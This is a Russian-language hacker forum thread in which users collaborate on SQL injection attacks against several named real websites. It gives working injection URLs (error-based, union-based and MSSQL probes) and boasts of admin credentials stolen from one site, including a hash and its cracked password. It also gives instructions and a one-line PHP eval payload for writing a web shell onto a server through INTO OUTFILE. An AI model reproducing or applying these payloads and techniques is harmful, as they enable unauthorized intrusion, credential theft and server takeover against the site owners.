хэлп помогтие раскрутить http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777' http://www.ncm.org.uk/news.asp?id=1' http://www.yakutproekt.ru/news.php?id=14517' http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail
http://www.ncm.org.uk/news.asp?id=1+and+1=(select+top+1+table_name+from+information_schema.tables) дальше сам
http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201&act=detail Если не знаешь как дальше, то пиши в ПМ
http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&act=detail mm?
чуваки в том то и дело что FROM никак не вставишь=(( хотел станд. методом так уж быть http://www.lpem.org/index.php?mn=6&sb=9&id=9+and+%28select+1+from+%28select+count%280%29,concat%28%28select+version%28%29%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--&act=detail Duplicate entry '5.1.50-log1' for key 'group_key'
тут точно не мускул, думаю ms_sql, но не скажу почему ) 21 столбцов но селект не робит. если есть желание копай дальше
ну да, mssql http://www.yakutproekt.ru/news.php?id=14517+and+len(@@version)=len(@@version) 4-ый сайт вообще не открывается без ошибки..
Выдрал лоигины и пассы админов на отдном сайте... Попал в админку) в админке написанно Extasy CMS for site.ru Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос и доступен html мб как то можно залить шел с помощью sql запроса?
для этого ты должен иметь права на запись и знать локальный путь до сайта. чтобы узнать есть ли права, используй запрос UNION SELECT File_Priv from mysql.user если в ответ получишь Y, то права есть. чтобы найти путь, попытайся вывести какую-нибудь ошибку, например через тот же sql запрос. или просмотри базу на наличие каких-нибудь конфигов. в них может быть указан путь. если права будут (в чём я сомневаюсь), и узнаешь путь, используй след. запрос для залития шелла: UNION SELECT 'шелл' from mysql.user into outfile 'путь_до_сайта/shell.php'
БД Таблы с БД zaokolmi pwd name 009091b3166dcbe1aa6202a97bcda08a zao пароль от хеша 123456 вроде Сайты на сервере(ReverseIP): больше 50 кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.
site?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php' -- Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. и да Требуются привилегии FILE
Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.
Ужасно глупый вопрос. Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение? В моем браузере отключены скритпы.
